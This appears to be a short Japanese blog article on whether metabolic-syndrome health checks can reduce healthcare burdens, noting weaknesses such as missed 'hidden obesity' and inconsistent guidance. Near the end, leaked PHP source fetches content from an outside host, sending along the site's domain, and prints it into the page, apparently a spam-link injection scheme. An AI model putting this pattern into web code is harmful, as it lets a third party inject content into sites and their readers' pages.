前へ
次へ

メタボ健診で医療問題を解消できるか

高齢化社会が進むと医療を受ける人が増え、そのための設備が必要になりコストもかかるようになります。
その問題を減らすにはいかに病気になる予備軍の人を減らすかが大事になってくるでしょう。
高齢者が病気になるのは老化が影響するのである程度は仕方がない部分もあります。
でもその前の中年や若年と言われる人たちの病気に関してはある程度防げる部分もあるかもしれません。
特定健診やメタボ健診は病気の予備軍の人に対して注意を促すためのものになるでしょう。
メタボ健診で注意しないといけない人として、まずは腹囲が一定数値以上の人が挙げられます。
余分な脂肪が腹囲につくことが多く、生活習慣病と言われる人にも腹囲が多い人が該当しやすいためでしょう。
では実際に医療問題が解決できるかですが中々難しい部分もあるようです。
腹囲を基準にすると隠れ肥満と言われる人は見過ごされる可能性があります。
また指導方法が統一されていないのでせっかく注意を促しても生活を改められなければ病人を減らせません。

".file_get_contents('http://links-001.com/kanren2set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top